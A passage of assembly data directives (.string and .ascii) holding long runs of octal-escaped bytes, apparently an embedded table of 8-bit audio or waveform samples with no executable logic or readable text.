"\367\370\365\362\363\356\356\355\353\347\352\352\347\354\347\341\351\343\342\345\334\332\334\327\325\330\324\315\321\325\322\327\330\336\337\336\346\347\350\352\356\353\355\355\352\350\344\331\325\326\316\320\321\321\317\323\333\333\336\342\342\346\346\350\356\350\352\363\357\363\365\372\377\001\003\003\007\005\013\017\020\022\027\025\031\031\031\037\034 &'&'*'*)))(* 4\026% \356\023\002\027 \026-\036\026\023\0376 \0174+G;\037$6G\020&\030\005.\024\b\"\r\002\364\353\343\337\355\364\355\361\355\355\026\365\372\005\357\356\t\031\376\006(&&5<6!2$/$\033!\r\037\022\0341\020\026\030\354\370\372\341\350\351\333\341\341\355\341\340\333\325\361\341\360\373\003" .string "\362\001\374\363\364\366\374\360\366\375\366\364\354\364\364\363\373\367\364\357\324\333\320\315\356\330\324\336\316\314\275\263\274\310\310\313\337\342\340\347\350\337\344\367\013\013\016 \026\023#\033\030\034\034\030\035(\024\022" .string "\364\371\362\002\363\367\373\352\356\365\345\364\366\366\007\007\032\r\f\f\n\t\020\031\034 \035\031\031\021\374\013\f\013\025\023\031\007\003\003\363\350\355\364\345\344\336\313\304\271\260\304\274\276\316\317\325\331\334\343\351\355\002\n\036\037(3 '*-1181)!\025\002\365\375\354\353\367\363\354\345\340\336\336\343\350\360\374\364" .string "\001\363\374\377\377\013\b\016\017\004\002\377\371\364\377\005\b\t\b\005\374\364\373\367\360\363\372\366\363\362\347\334\332\330\331\342\343\353\347\347\347\340\346\351\355\376\005\f\031\030\030\031\033\"%-324%$\037\032\030\032\034\031\037\034\026\016\b\b\n\017\032$$$'\"\035\037$$++.3#'!\030\037\"(0/*,#\032\035\036\027\032\033\021\013" .string "\370\360\347\346\350\346\345\350\337\325\322\320\321\327\340\353\366\367" .string "\003\003\006\t\025\025\036*%&\037\025\023\013\007\t\b\005" .string "\373\366\360\354\356\360\362\374\003\376\374\377\366\362\363\367\373\375\376\374\371\361\357\353\350\355\356\361\370\363\361\357\344\343\345\344\345\351\353\346\342\333\326\323\315\317\325\322\323\326\322\316\314\316\316\324\332\343\351\345\347\346\340\343\350\352\357\366\374\373\367\363\360\356\352\355\364\364\365\367\362\360\360\355\365\374\377\t\017\017\020\022\016\r\020\023\031\031\033\034\024\016\016\f\b\r\022\024\025\021\016\013\004\002\004\003\007\t\n\b" .string "\374\367\362\363\365\371\373\374\374\367\363\360\357\360\361\362\367\366\357\354\351\342\341\346\351\355\361\365\365\360\356\357\357\361\370\377\002\007\t\006\005\002\003\013\f\021\033\031\026\025\022\r\f\r\020\024\023\023\023\013\005\003\377\377\004\006\n\t\005\002\376\367\366\371\366\370\372\366\361\353\345\342\337\341\347\354\357\363\365\361\360\362\365\372" .string "\005\013\r\b\007\003\375\375\376\377\377\377\373\366\353\345\343\337\337\346\353\355\361\363\364\364\366\375\007\016\027\"%&'%%(+24451)&$!#(+-*%#\034\026\027\031\031\032\032\027\021\013\006\004\002\004\f\017\021\024\022\016\016\017\022\030\035\"'$\036\035\026\017\r\f\t\006\377\371\357\342\332\327\322\324\332\334\340\342\341\343\345\350\363\376\006\022\034\035\037 \037\037\"&+,)(\"\031\025\022\021\022\023\024\022\r\005" .string "\370\363\364\364\363\364\362\355\347\340\334\333\333\337\347\350\351\354\352\350\351\354\362\371\376\006\n\007\004\003\376\373\375\375\375\373\366\361\347\333\326\322\315\317\321\316\315\313\307\306\306\310\322\333\342\354\364\365\367\372\375\002\007\016\027\032\032\035\032\025\026\027\030\035\037 \037\032\024\021\013\007\n\t\007\006\003\375\367\360\356\356\355\361\367\367\370\372\372\372\375\001\b\021\024\032\035\032\030\027\024\022\023\023\020\f\005\377\364\350\343\335\325\322\320\312\306\301\276\275\276\300\311\321\327\340\347\352\356\363\370" .string "\006\r\025\026\030\032\027\023\025\025\025\027\030\027\025\016\n\b\002\377" .string "\377\373\370\364\356\351\343\341\341\337\342\345\344\344\345\344\345\350\354\361\367\371\376\001\376\377\001\377" .string "\002\004\003" .string "\374\371\362\352\350\346\341\340\336\332\327\323\320\320\316\316\324\327\327\334\336\336\340\344\350\355\363\371" .string "\002\005\n\013\013\020\024\027\033\035\037 \034\033\034\031\030\032\031\027\025\022\r\n\007\007\007\006\b\013\t\t\013\n\013\r\020\025\030\031\035\037\034\034\036\036\036\037\037\037\034\030\025\021\f\n\b\005\004\002\375\372\365\361\357\353\347\351\347\343\344\343\340\340\342\344\351\354\361\370\373\375\004\b\f\022\030\035#%(*'&'#!\"\037\032\027\022\r\t\004\003\003" .string "\377\001\377\375\376\377\377\001\003\b\013\n\f\016\013\013\f\013\013\013\t\b\005\001" .string "\375\371\371\371\367\367\370\366\365\363\363\364\363\362\366\366\363\363\363\357\355\354\353\354\353\352\354\353\352\355\357\361\366\373\377\004\b\r\021\022\024\032\033\033\037 \036\036\035\033\032\027\026\027\025\024\025\024\022\023\023\025\026\027\033\035\034\036\037\035\035\037\036\035\035\034\032\030\024\023\021\r\f\r\013\t\t\b\007\005\004\006\006\004\006\007\003\002" .string "\374\371\365\361\357\353\347\346\344\340\341\342\342\345\351\355\361\365\372\377\002\005\f\020\021\026\030\030\030\027\026\026\023\022\023\021\r\016\f\t\t\b\007\b\007\b\b\006\006\006\004\002\003\002" .string "\377\375\374\373\366\365\365\361\360\362\361\357\357\357\357\360\360\362\364\363\365\367\366\365\365\363\362\361\357\356\354\350\350\346\340\337\340\335\334\336\337\337\340\341\344\346\347\354\360\362\365\370\372\375\376" .string "\003\004\005\t\013\n\016\017\017\021\022\024\025\026\027\031\027\026\027\026\023\023\022\020\016\013\t\007\003" .ascii "\001\376" .string "\374\375\375\374\375\375\376\377" .string "\002\005\005\006\t\b\007\007\006\005\003" .string "\377\374\367\364\361\353\346\344\340\334\332\330\327\327\324\326\331\331\334\341\344\347\354\357\363\366\371\376\001\002\006\t\b\n\r\f\r\017\017\020\020\017\021\021\r\r\016\n\b\007\005\002\376\373\371\365\361\360\356\353\353\352\350\350\351\351\352\353\354\360\361\361\364\366\365\367\371\371\371\370\370\370\365\363\362\360\354\353\351\347\345\342\340\337\334\332\333\331\327\331\331\330\332\334\335\340\343\346\353\355\361\367\371\374\001\005\b\013\016\022\025\025\030\033\031\031\033\032\031\030\027\025\023\021\017\r\n\007\b\005\003\003\001" .string "" .string "" .string "\001\002\001\004\006\004\006\n\t\t\n\013\013\013\n\013\013\b\007\007\005\003\002" .string "\375\372\367\364\360\353\351\345\340\336\335\331\327\327\327\330\331\333\340\344\346\355\363\367\375\004\t\r\021\026\033\034\036!!\037 \037\034\032\030\025\022\016\013\t\005\001\001\377\373\373\372\371\370\371\371\372\371\373\375\374\373\376\376\376\375\376\375\376\374\373\373\367\365\364\363\356\364\354\344\342\375\006\376\300\313\006\355\357\377'\345\021>\027\"!\375\022@\345\016\016\016Ij\364\355(\321\335\0242\343\026\025\017\363\013N;I$\374\336\303\302\354\324\345\347\350\363\371\352\317\352\364\346\361\377\370\326\306\301\253\261\311\305\260\310\323\327\313\327\266\327\332\271\340\315\337\333\311\262\274\313\351\337\351\363\341\002\344\355\017\021\026&\033%'\025" .string "\345\364\375\367\362\007\025!70/5QOAWefO:%.++\025\t\033\f\f\371\365\375\360\366\356\336\362\367\353\352\341\337\345\353\326\330\355\356\002\357\365\006\001\366\356\360\345\363\356\321\313\331\330\337\322\332\366\362\362\370" .ascii "\024\034\022\n\001\024\033\017\007\002\020\025\024\024\03503" .ascii "57?ORUM@KL4\036(0'&\031%>=53<XbWPDC/\033\021\f\n\b\362\345\352" .ascii "\352\362\351\341\345\364\365\351\337\341\345\345\330\316\307" .ascii "\271\257\242\242\267\322\327\332\332\345\372\364\343\337\334" .ascii "\332\326\311\305\315\341\346\334\343\371\013\030\026\0367HMD" .ascii "</0)\016\t\r\022\r\373\374\n\022\030\033\032#4- \031\027\032" .ascii "\023\376\377\006\007\001\365\372\006\023\027\022\013\030\026" .ascii "\021\005\374\003\002\364\336\334\337\336\332\315\313\334\351" .ascii "\354\344\345\356\364\350\331\331\332\336\323\300\271\276\276" .ascii "\273\266\273\323\342\345\341\345\361\354\337\315\305\317\314" .ascii "\276\267\266\301\316\314\313\335\370\n\031\"-96,\036\025\033" .ascii "\027\002\364\361\367\364\354" .string "\344\355\005\f\025\034':@7.-2/!\032\037,.%#)7;948B@.!#%\034\r\005\003\f\020\006\001\013\034\036\027\027\036,#\021\n\006\n\002\361\347\345\353\350\335\335\351\367\375\367\366\003\r\007\374\365\370\373\365\344\335\343\354\357\353\366\017\"$\036\032 &\035\f\004\002\001\367\343\333\341\350\344\337\345\367\007\017\013\020\037$\033\003\357\354\353\341\331\340\360\376\004\004\016\"03-1@E>2034)\030\026\036%%\"-AF@5085&\024\f\013\004\362\342\334\341\343\332\321\325\343\350\341\332\337\350\353\342\324\321\325\321\302\266\267\300\301\270\264\275\315\324\322\320\330\345\345\332\316\315\323\316\276\266\272\304\310\302\301\315\337\351\352\352\365\004\003\367\355\360\366\361\344\336\344\355\357\350\343\354\371\373\365\364\376\r\r\003\002\t\021\022\n\b\025%)#\",88-)14+\033\r\r\f\001\362\353\364" .string "\002\375\003\023!$\036\037+3/$\036\037!\025\001\373" .string "\005\001\370\373\t\022\023\r\016\032\"\033\r\007\n\n\374\351\344\352\353\350\341\343\362\376\376\372\377\r\026\r" .string "\376\002" .ascii "\364\347\344\354\361\356\346\354\374\b\006\002\013\030\035\027" .ascii "\016\017\032\036\030\021\023\035 \026\f\020\033\037\031\022\025" .ascii "\036\036\023\006\001\006\005\367\354\357\372\376\370\363\372" .ascii "\005\004\372\362\366\006\r\007\004\f\026\027\013\003\007\020" .ascii "\021\013\t\023%,**4BD:4:@>3))-&\030\016\022\033\031\016\007\016" .ascii "\024\017\377\364\362\362\350\327\314\315\323\320\306\305\322" .ascii "\337\342\334\333\345\356\350\334\323\323\325\313\273\264\272" .ascii "\300\277\270\272\310\325\330\325\327\341\352\350\333\326\331" .ascii "\332\322\302\276\304\311\305\277\301\315\332\334\332\337\355" .ascii "\367\365\354\353\360\357\343\327\321\324\327\322\315\322\337" .ascii "\355\361\361\373\013\027\030\024\027\036\037\026\013\006\b\n" .ascii "\003\372\375\006\013\t\006\n\024\030\024\021\022\030\033\025" .ascii "\016\020\027\033\032\030!/7" .string "89=DG?6440%\031\030\033\032\025\023\030#('(+24+\"!\"\034\021\t\007\n\t\004\003\007\016\022\017\r\022\030\026\020\t\n\n\004\374\365\365\367\370\363\362\372\003\007\t\f\025\035\034\027\021\016\n\002\364\352\347\346\342\334\331\337\346\346\346\351\356\363\363\354\350\347\345\335\317\304\277\273\264\260\263\275\312\323\333\345\361\374\001\001\002\t\013\b\004\003\007\013\f\f\021\032#)-3=CB=972'\035\027\024\022\016\t\t\016\022\021\017\020\024\025\017\n\007\005\003\376\367\365\366\370\366\364\366\376\003\003\003\007\013\f\t\004\003\002\377\372\362\357\361\357\355\353\356\363\367\367\367\372\376\377\374\370\364\364\360\350\341\337\337\337\335\335\342\347\353\354\354\355\360\357\351\343\337\335\330\321\315\315\316\317\321\323\332\343\351\354\356\362\365\364\355\351\346\341\333\324\316\313\313\313\313\314\322\334\342\346\355\365\372\376\376\375\376\376\374\371\367\366\372\372\370\373" .string "\005\t\n\016\024\027\030\027\025\024\025\023\016\f\f\r\f\n\013\020\022\024\026\030\033 \036\035\036\037\035\030\027\030\030\030\031\031\035\"#%&)++'&&$\" \037\"%'*/4:;:;<94.(#\035\026\017\n\006\005\003" .string "\001\004\006\007\006\005\006\002\373\364\356\351\346\342\337\342\345\351\355\360\367\377\003\b\r\021\025\030\031\030\030\031\031\030\025\030\032\034\036 \"&'$# \036\032\023\013\006\001\372\363\355\351\346\343\341\340\340\341\344\344\343\346\350\347\345\343\341\337\333\326\323\321\316\315\314\314\316\321\324\326\327\332\336\335\334\334\333\332\330\325\323\322\322\322\322\321\323\327\327\330\332\334\334\335\334\333\334\333\334\333\332\333\335\334\334\335\336\340\340\340\340\342\342\342\342\340\342\344\343\343\345\350\352\354\355\360\364\365\367\370\370\371\372\370\366\365\364\364\363\363\365\370\372\376\003\007\r\024\030\033 %())++*('&&&%&'),,-012110.-*)&&&%%')*+,-.-+*'$# \035\033\033\033\034\034\036!\"%&'(**)(('%\"!\037\033\030\026\023\021\020\016\f\n\t\007\005\001" .string "\375\371\365\363\360\355\351\345\342\335\332\327\324\320\320\320\320\322\324\327\332\334\337\343\346\351\356\361\364\370\375" .ascii "\003\006\t\f\f\r\017\020\017\020\017\r\f\n\b\006\003\003\002" .ascii "\377\375\374\373\371\366\363\360\354\351\346\343\337\335\334" .ascii "\332\331\332\333\334\335\336\337\341\340\340\340\336\336\335" .ascii "\334\332\332\332\332\333\333\335\336\337\342\343\344\345\347" .ascii "\346\346\346\346\345\344\343\343\343\342\342\343\344\345\350" .ascii "\351\353\355\360\361\362\361\362\361\360\354\350\344\344\342" .ascii "\342\343\344\347\353\356\361\371\375\001\002\b\005\n\006\013" .ascii "\005\007\374\003\013\026\003\366\374\340;\016\307\005'\005!\367" .ascii "\362;\346\372\031\350\367\020\346\016\025$C\001\021\006\306\033" .ascii "%\017\035\371\024\275\241\322\240\301\374\3555\025\377\r-\346" .ascii "\343\037\335\t\354\"\310\316\350\331\316\277\362\311\323\354" .ascii "(\364\033$\324\354\373%G\0370\023\032\"\332\365\021\311\374\356" .ascii "\324\025\265" .string "\335\347\330\354& \023.\3739!\0203P>G*\005\035\372\366\323\005\007\026\037\337\353\302\256\350\325\365\363\325\022\345\377\032\375\004&1aDD/\002\023\003C\022\373&\n\363\374\312\366\351\273\335\371\006\006\030\005(\027\035+-EH=*EN\"\026\025\026\372\001\007\006!\354\026\033#\033\370\025\006$\f\030\377\343\n\n\026\r\022" .string "\366\350\341\343\352\310\302\340\314\022\005\342?\017\345\031\377\367\364\001\n\365\377\337\001\030\351\367\031\"\0162#\003\r.#<&\017\021\350)222\036\307\331" .string "\322\336\363\270\313\325\252\325\312\307\307\325\330\367\364\036\377\367\024\016,$\004\003 \366\363\006" .string "\273\341\334\304\321\327\331\332\346\311\320\352\354\362\002\351!\r\t$\371\025\374\361\375\365\007\357\f\372\373\037\035\001\n\007\357/\362\372\367\327\354\353\004\343\357\361\350\366\023\b\035\f\335\026\005\t\024&\r)\004\376G\021'5\024\026\036%G\375\021\"\r\013\343\n\374\320\340\352\360\346\365\007\005\0061\"#J5C\037W8',3/$:\b%" .string "\342\355\t\001(\025\t*\352\021\020" .string "\"\003\025\034\023\030\004\013(\033\035\036\021\004\347\006\320\312\322\274\321\322\322\363\017\373\365\321\001\023\357\006\034\003\351\t\r" .string "\021\006\007\0131(0+\372\037\007\002'L\030\016-&\035-(\006\026\001" .string "\372\342\373\330\257\322\265\312\272\305\315\316\333\313\n\364\362\021\f\366\025!\b\365\352\371$ \353\004\350\363\357\373\363\346\356\322\335\327" .ascii "\341\326\363\372\374\376\374\357\351\354\320\314\327\313\330" .ascii "\342\343\343\001\026\001\377\371\377%(=C\036\372\n\375\037\027" .ascii "\007\020\367\365\373\005\356\016\345\273\336\t\007\370\376\342" .ascii "\320\360\f\036\037\026\024\0352,95=\f 9\030)\032\027\002!)\026" .ascii "\027\007\b\007\006\0324\022\033(\034\023\0040!\013\375\377\021" .ascii "\367\002\b\362\351\003\n\013\013\027 )7.7\027\0218(483\025\372" .ascii "\006\006\023\376\370\350\330\275\316\262\242\266\257\317\321" .ascii "\341\006\b\343\367\362\375\006\n" .string "\024\013\r\033%\036\030\034*/(#9\003\005\026\b\037\033\032\027\017\024\023\025\021\017\007\360\356\360\354\305\315\267\242\306\263\304\331\310\277\324\331\332\352\356\361\364\023\t\021\016\371\t\364\353'\003\357\026\337\350\337\344\374\343\340\343\344\371\347\372\364\341\360\370\t\373\353\325\326\275\315\331\326\302\307\334\326\346\360\360\371\351\357\375\374\005\371\b\370\367\b'5\016\004*\027\035/\022\005\001\t\374\377\004\366\364\357\365\361\355\023\n\016\003\021\026\034\"\373\002\002\036\027\030\t\360\377\001\003\023\020\b$\032\r2:06+,;AG<\"8($9\035\b\007\005\364\023\377\366\005\345\377\026\013\007\356\364\360\374\030\026\020\366\353\364\367\005\005\336\344\331\312\315\326\324\270\273\316\344\372\017\033\r\013\0332:33/'%\037##\007\016\005\004\013\001\002\003\353\363\362\372\352\330\006\346\371\001\352\374\365\345\356\367\355\370\357\350\341\324\353\353\364\361\354\335\370" .string "\357\f\364\353\377\025\025!\033\t\004\371\354\346\356\342\305\313\304\313\320\316\304\256\304\313\346\332\330\354\346\354\362\366\003\370\356\353\345\342\363\363\342\367" .string "\365\364\364\005\377\373\006\375\026\013\t\370\020\026\n\032\025\021\004\023\016\n\021\005\362" .string "\361\357\365\363\357\362\365\376\003\002\r\023\b\005#\r\026\024\004\017\031\034\021\033\f\007\n\b\377\f\t\023 \r- +1 0)LB%)!+%\025\033\036\003\r\r\r\013\016\r\007\b\371\032\006\022\005\356\n\357\360\002\003\377\364\375\353\340\353\326\306\304\303\273\277\277\310\321\320\341" .string "\013\375\013\023$!\0352\032'0-5/2+\026\035\030\013\030\r\b\r\b\003\007\367\362\374\373\005\375\356\367\360\340\341\350\334\311\336\316\305\324\315\325\302\304\332\325\337\351\364\351\366\005\374\005\016\r\004\013\375\r\002\376\370\364\342\340\354\344\367\337\344\362\362\355" .string "\360\360\367\366\367\352\366\354\345\332\320\332\323\332\321\314\315\320\333\326\334\331\334\311\335\342\342\361\350\355\347\370\005" .string "\b\005\374\n\022\016\017\020\022\016\013\n\023\032\024,!+4+5$/A:(2,+##\037\r\032\023\005\005\376\004\376" .string "" .string "\376\004\372\027\020\n\013\017\n\n\r\027\033\003\017\013\002\376\020" .string "\001\017\013\024\025\f\030\032\024\036\036#\027\035%\030\033\035\f\030\004\022\n\367\374\325\333\330\317\306\336\327\317\351\357\351\363\003\373\002\b\020\b\017\017\016\r\t\024\007\f\013\023\006\003\004\373\002\365\367\360\367\376\372\004\371\365\005\372\377\374\373\t\364\362\367\352\346\350\353\341\352\343\343\353\350\364\356\365\003\b\b\023\376\b\001\373\006\377\007\356\363\370\350\335\347\342\331\337\334\336\335\334\340\351\343\354\355\344\354\356\355\354\340\330\340\336\332\321\323\326\312\324\322\337\345\317\335\342\333\345\344\353\367\357\357\371\377\004\b\006\f\022\017\r\030\026\027\032\024\f\007\031\025\024\031 $%-/#/6&5+.,\035\031\024\025\007\003\b\003\375\377\375\004" .string "\370\b\013\007\f\026\022\003\020\031\026\023\377\n\021\006\017\004" .string "\001\377\004\013\t\003\016\007\006\024\f\020\030\025\027\022\024\026\016\021\021\006\374\365\367\365\342\337\342\324\327\335\330\341\344\340\363\373\001\007" .string "\002\021\034\022\034\026\026!\023\025\031\026\017\026\r\t\013\b\b\004\370\004\b\363\376\376\375\361\005\367\355\367\343\370\350\340\353\331\335\331\327\336\323\336\342\335\334\331\362\362\346\375\373\366\375\377\001\002\373\377\002\366\361\367\367\345\354\355\346\363\351\355\366\361" .string "\372\006\007\004\n" .string "\003\375\003\371\357\361\351\345\342\347\340\332\340\335\333\331\332\334\336\334\344\344\327\345\354\356\362\356\367\004\356\373\005\362\377\371\367\375\004\006\n\001" .string "" .ascii "\007\004\r%\034 '444453--2\037\025\f\003\025\003\006\355\355" .ascii "\357\3300*\353\037\037\005\3670.\033;\001\372\005\t\315$\376" .ascii "\314\006\326\004\333\342\032;\354\347\372\017\016\311\303\255" .ascii "\307\313\001\006\007\023\341\004\364\354\371\362\t\357\370\344" .ascii "\364\373\002\b\365\367\r02<\036\024\t!$1&\f\350\276\274\253\304" .ascii "\222\257\276\233\263\272\323\345" .string "\r\024#\"\025&\022\017\b\004\373\331\321\360\004\007\016\037\021.,\013\030\0137F-\031\016\026\017\004\356\364\t\376\001\352\345\370\022\362\305\360\351\344\332\357\351\315\356\353\344\343\373\022\023\026*G>H@6@7K%+;#/&=D8&\022\033$\025\016\372\365\362\353\340\313\340\315\332\323\311\324\244\256\272\270\326\346\371\373\371\b\034\022\372\022\021\b\025\013\017#081KBHY/'*$\021\372\340\347\345\314\317\306\311\336\330\323\307\314\373\330\331\346\347\367\315\321\314\312\332\320\303\306\322\327\350\357\343\376.\033\b\03585'6$\013\016\r\373\373\017\005\367\346\341\334\344\322\317\326\302\351\340\316\343\f\013\343\370\347\347\364\341\342\351\352\346\340\325\345\370\376\375\001\001\026\b\003\n\032079\017>KD>AE;-\026\021\003\377\375\361\322\355\354\345\332\337\357\022\373\356#\005\375\005\f\357\360\001\364\363\352\347\372\370\366" .ascii "\020*,/KVRiN7?+&\021\f\036\023\"\b\370\031 (\026\373\364\353" .ascii "\324\303\301\311\340\326\313\302\271\335\342\274\322\366\370" .ascii "\001\364\376\007\031\033\022\022\017\022\003\361\360\367\006" .ascii "\007\376\n\037.\025\021\022=-*&\376\025\003\026\366\344\367\361" .ascii "\346\336\351\361\367\361\345\347\361\346\345\331\310\300\323" .ascii "\302\273\311\333\316\305\315\311\335\332\351\322\326\365\001" .ascii "\347\332\320\320\327\307\306\326" .string "\341\370\013\376(2QHMK8F$\f\377\376\345\352\326\327\362\365\376\377\006\023\037\017\025 ,'\027\002\355\372\365\355\327\311\316\342\347\345\375\373\367\002\372" .string "\024\023\n\005\r\024\032\t\b\021\"&\027#59<=/<@/\037&+6*#6+//,\")1&\031\007\005\f\376\334\320\353\331\316\277\243\250\246\240\236\300\301\321\340\352\367\002\026\013\372\375\t\004\373\365\370\005\025#\"'9H<038A#&\036\027%\022\377\360\005\f" .string "\376\370\n\020\375\363\362\365\367\353\326\325\326\332\317\304\272\307\323\317\315\327\346\352\356\331\343\353\343\336\316\302\307\306\265\276\314\326\330\334\331\336\354\372\372\367\002\r$\021\t\034#)\034\f\024\023\016\006\002\373\004\n\355\375\b\027\031\013\005\b\f\007\377\364\374\001\t\376\370\374\006\005\371\374\366\004\020\362\353\361\371\001\355\336\347\005\001\367\b\022!\"#\034%,#\033\r\017\025\030" .string "\n\f\024\035\023\"3<BRPae_;70$!\002\006\007\001\374\374\364\377\t\003\367\355\345\347\327\311\311\326\331\317\312\304\333\343\337\335\351\355\377\372\353\375\001\020\020\017\003\r\022\370\361\353\365\375\006\376" .string "\022\031\027\016\025\027\026\006\006\362" .string "\377\354\363\334\363\374\363\353\355\006\033\020\017\027\026\033\024\003\366\372\370\353\323\326\340\333\321\320\326\337\347\340\344\341\347\365\343\320\322\320\314\275\273\301\315\320\322\330\334\362\001\370\342\360\362\366\347\327\336\337\326\314\325\336\357\370\001\001\023#*)+.;3+,\034%\025 \n\n\032\031&\024/9=5-==0&*!\034\030\007\375\376\003\001\366\366\376\006\004\t\005\b\005\r\b\377\013\004\003\375\016\025\r\016\b\002\016\006\001\001\366\372\b\374\351\355\365\364\347\336\324\332\325\325\334\343\361\006\017\022\021\027\"!\023\007\033\033\023\016\013\033#%*.8A:0><8)\031\031\017\003\371\363\355\343\345\345\334\335\346\347\343\341\341\343\344\332\331\335\324\332\314\307\311\316\327\324\316\325\342\340\331\340\344\337\343\327\327\315\331\335\330\324\336\353\346\351\353\365\370\376\374\376" .string "\003\005\004" .string "\376\005\375\362\373\371\364\372\366\363\375\376\001\r\007\020!\" \025\034\"\030\r\001\r\017\013\t\004\006\023\025\017\023\023\027\031\017\013\022\f\007\005" .string "\374\002\004\376\001\b\013\t\n\006\373\002\372\364\002\377\364\366\367\363\374\005\022\f\f\025\").2/0'#\033\023\020\f\376\374" .string "\001" .string "" .string "\001\n\013\t\f\006\002\363\376\365\355\374\364\370\375\367\376\377\375\b\007\020\021\030\035\037#-.''*!\024\025\021\013\007\006\377\374\372\367\364\356\347\355\347\341\330\331\330\325\317\314\325\310\332\326\327\327\336\342\341\352\355\364\357\350\341\331\314\317\322\315\312\332\330\325\333\337\353\361\364\371\004\002\002\003\376\371\370\363\356\352\352\354\357\354\362\375\372\004\007\007\377\006\003" .string "\001\374\003\t\372\366\f\003\021\b\f\035\036\033\020\032\033\027\026\017\b\016\n\017\r\r\021\016\017\024\024\023\032\032\030\026\030\023\020\n" .string "\006\373\365\372\365\362\366\370\365\365\001" .string "\002\004\013\034\025\020\017\030\027\026\034\027\017\017\025\021\n\013\016\016\016\n\t\b\007\b\004\004\377\375\373\357\352\351\345\341\343\346\357\361\367\375\377" .string "\007\021\017\017\013\025\026\025\034!-,3:/6615/\"\032\020\b\f\001\363\356\360\354\357\351\347\355\354\360\361\355\354\362\355\352\352\350\343\342\335\331\333\325\325\326\324\321\324\331\323\333\330\335\331\320\335\331\343\340\343\335\336\344\344\352\341\351\351\345\334\335\337\340\340\345\341\333\346\345\345\345\346\352\355\353\360\367\371\376\003\006\b\f\017\021\020\016\024\022\013\017\024\024\030\032\032&\"+22<260,.%*\037\037$\033\035\031\023\027\031\027\027\024\032\037\033\031\021\025\023\021\025\020\r\020\023\022\024\024\027\030\023\024\026\r\t\b" .string "\374\371\363\357\360\355\356\357\357\361\356\354\343\343\332\324\315\315\314\312\316\310\322\317\331\327\331\345\352\372\374\002\007\022\026\033),&%)!\037\035\025\025\017\t\016\t\005\b\004\002\004\005\005\005\002\003\005\002\377\004" .string "\376\002\002\374\377" .string "\376\375\374\002\002\372\367\367\364\364\361\357\357\371\364\363\372\364\374\374\002\004\001\002" .string "\374\363\360\353\341\345\345\327\331\336\332\337\334\337\346\346\346\353\352\346\351\346\342\343\343\342\341\340\343\347\346\351\360\362\361\367\371\374\377\002\006\013\017\017\026\022\024\027\030\023\025\007\374\004\025\371\356\023\t\004\001\0344\003\t=8\335\0068\336\321\370 \001<\361\007J\"/\366,>\312\330\035\251\265\321\362\353\311\312\351\b\005\036\323\346" .string "\367\347\374\336\342\345\262\356\320\256\265\274\310\354\370" .string "\017\350\353\335\340\335\364\350\363\t\356*!+7:\036-B.J\b\021\025\376\0206%(/\021\025\377\033\036!\026<'\"?\027\034\003\371\346\370\327\330\335\265\335\306\317\323\276\274\351\351\350\b\341\001\376\364\376\004\364\020\f\366\021" .string "" .string "\013,4f[XdTQP<(A\034\037\031\021\033\n\016\013\004\335\360\370\377\026\b\017\003\365\350\367\332\352\347\325\350\336\352\360\023\"5\031\032&\t\b\371\356\340\326\300\355\337\302\323\264\270\307\320\307\361\344\364\016\367\003\005\003\372\025\374\r\003\363\023\002\371\017\024\b7/A?0%\027\037\001 " .ascii "\r\002\332\325\302\272\300\320\300\354\343\371\016\005\t\001" .ascii "\353" .string "\341\365\312\330\306\263\267\277\274\317\365\325\377\366\005\t\375\025\006\376\364\n\360\004\367\350\364\355\356\373\021\0134)7@<</22F%?503'*8L-P<FD745:4J (\020\371\361\337\316\320\325\303\336\324\332\326\326\325\315\260\237\272\246\307\315\304\323\332\323\355\367\360\027\003#\036\031\036)2/5\025%\r\004\003\371\371\006\r\006)\030'.\030\034\034\004\004\032\377\030\b\377\376\366\361\013\026\001\034\017\030\017\006\371\376\345\350\366\327\351\321\303\276\274\261\315\316\277\336\274\274\275\255\250\257\256\264\320\317\362\356\361\374\006\375\376\b\001\025\360\375\374\365\366\004\001\377\t\364\020\375\006\003\f\b\034%&?0B/6'/%2-\0301$*%*\020713S0@7-%'\017\024\026\371\007\362\360\361\367\374\r\f\f\024\367\373\363\352\324\327\316\321\335\331\344\326\322\307\305\263\324\314\336\t\367\006\b" .string "\365\004\356\374\374\355\002\367\002\016! 778B-9- \037$\025\"\036\005\016\377\013\n\373\374 \033\035+\017\"\030\f\005\005\357\364\361\335\346\322\315\304\312\300\331\321\324\341\314\315\311\310\275\314\300\315\307\276\306\266\273\272\311\312\355\373\007\037\003\013\004\371\345\336\335\334\312\301\313\275\323\326\344\345\002\004\020\"\027(\037\037\033)\032**\"(\037-):5JJM]TT@?4E,5.\021!\016\022\024\020\b&\021\027&\024\031\031\036\035*\024\035\024\004\b\367\363\364\373\363\005\377\007\006\357\352\314\300\254\272\260\271\302\273\310\271\272\302\324\317\351\363\003\013\f\022 \027,\016\034\022\r\017\002\003\b\017\n$\031$&\034\036\032\020\013\022\376\017\b\374\365\357\363\360\357\354\006\364" .ascii "\002\377\372\362\365\355\001\361\006\367\361\376\371\374\370" .ascii "\005\375\r\007\377\376\361\347\345\333\332\345\335\352\337\334" .ascii "\330\315\307\310\306\276\317\307\323\325\315\317\326\327\334" .ascii "\343\344\366\353\365\357\353\372\372\001\006\023!,\037\037\032" .ascii "\034\023\023\034\017\037\023\022\017\b\013\024\022\024'\034%" .ascii "& \035\037\035\037,\"545FJGVXWbMTC" .string "6#!\030\022\032" .string "\006\363\346\333\312\301\313\320\326\344\344\367\356\362\366\365\363\372\001\372\013\005\f\022\021\024\034\030\025 \021\023\t\001\373\364\350\347\346\320\333\314\307\314\305\303\312\306\310\326\320\321\314\307\310\327\314\332\334\316\334\332\336\334\351\346\373\377\001\f\001\n\004\005" .string "" .string "\366\363\360\344\353\333\336\337\342\345\365\377\004\031\016\031\023\r\006\005\367\376\377\361\n\377\013\t\r\021$!&51?51(,$+\037\024\031\024\017\020\013\b\022\005\n\021\f\f\f\n\003\003\375\003\003\373\006\375\001\001\007\005\r\016\027 \030'!#\023\027\r\013" .string "\365\365\343\335\330\334\325\346\332\347\345\330\333\320\313\300\316\311\317\317\325\342\347\352\360\367\375\026\016\033/.;<;9<,/)\032\036\017\016\b\007" .ascii "\013\002\007\r\002\013\003\005\372\004\371\377\372\365\376\370" .ascii "\376\001\t\b\021\006\021\020\b\024\r\377\374\371\350\362\352" .ascii "\344\351\343\335\333\336\333\345\336\345\346\337\346\344\335" .ascii "\341\352\337\351\343\337\342\327\326\330\326\322\340\332\343" .ascii "\354\353\366\365\365\364\373\361\370\367\355" .string "\367\360\360\366\366\360\001\371\005\t\376\n\002\006\376\005\002\b\377\375\t\t\022\022\027\022%\033&+$)#%\036\037\023 \027\025 